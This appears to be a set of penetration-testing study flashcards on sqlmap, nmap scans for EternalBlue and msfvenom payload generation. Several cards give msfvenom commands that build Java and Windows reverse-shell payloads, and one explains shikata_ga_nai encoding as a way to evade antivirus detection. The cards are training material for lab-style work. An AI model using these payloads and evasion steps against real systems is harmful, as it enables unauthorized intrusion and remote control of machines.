basics Flashcards

1
Q

How do you use sqlmap?

A
  1. attempt login to web server (e.g. username=admin, password=admin)
  2. intercept with Burp
  3. Copy and paste intercepted data into file (w/o spaces) named login.req
  4. sqlmap -r login.req –level 5 –risk 3
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What is the MS Bulletin for eternalblue? What is the name in nmap?

A
  • ms17-010

- smb-vuln-ms17-010

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is the starting nmap command?

A

nmap -sV -sC -oA nmap-scripts 10.10.10.40

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

What is the nmap command for specifically looking for Eternalblue?

A

nmap -p 445 –script safe -Pn -n 10.10.10.40

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

MSFvenom: List available payloads

A

msfvenom -l payloads

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What is a Staged Payload?

A
  • Staged payloads send a smaller stager to the target, which connects back to the attacker and downloads the rest of the payload.
  • Staged payloads are denoted with the use of a forward slash (/; eg windows/shell/reverse_tcp)
  • Staged payloads require special payload listeners, such as multi/handler in Metasploit
  • Staged payloads are ideal in situations where you have limited shellcode space, most commonly in Buffer Overflows.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What is a Stagless Payload?

A
  • Stageless payloads send the entire payload to the target at once, and therefore don’t require the attacker to provide more data.
  • That means we have a variety of listeners we can use, such as Netcat
  • Stageless payloads are denoted with the use of an underscore (_, eg windows/shell_reverse_tcp)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What are the MSFvenom flags for Architecture and Platform?

A
  • Architecture = -a

- Platform = –platform

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What is the MSFvenom flag for bad characters and what is an example of its use?

A
  • Bad Characters = -b

- Example: -b ‘\x00\x0a\x0d\x20’

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

What is the best and mot common encode for MSFvenom?

A
  • x86/shikata_ga_nai
  • In Japanese, means: “it cannot be helped”
  • Reorders instructions and dynamically selects registers to encode our shellcode and get different output each time, making it harder for AV detection
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

What is the MSFvenom flag to make with the lowest number of bytes?

A

–smallest

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

What flag do you add onto the end of MSFvenom to fill out the remaining size of the shellcode with a NOP sled?

A
  • NOP sled: -n

- Example: -n 20

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

MSFvenom: Java Reverse Shell

A

msfvenom -p java/jsp_shell_reverse_tcp L HOST=? LPORT=? -f raw > shell.jsp

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

MSFvenom: Windows Reverse Shell (Powershell)

A

msfvenom -a x86 –platform windows -p windows/powershell_reverse_tcp LHOST= LPORT= -f python

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

MSFvenom: Windows Reverse Shell (Shell)

A

msfvenom -a x86 –platform windows -p windows/shell_reverse_tcp LHOST= LPORT= -f python

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What is the command to start an Apache server?

A
  • service apache2 start
17
Q

What is the command to watch access log data on the Apache server?

A

tail -f /var/log/apache2/access.log

18
Q

What is the command to watch connections being made on your tun0 interface?

A

tcpdump -i tun0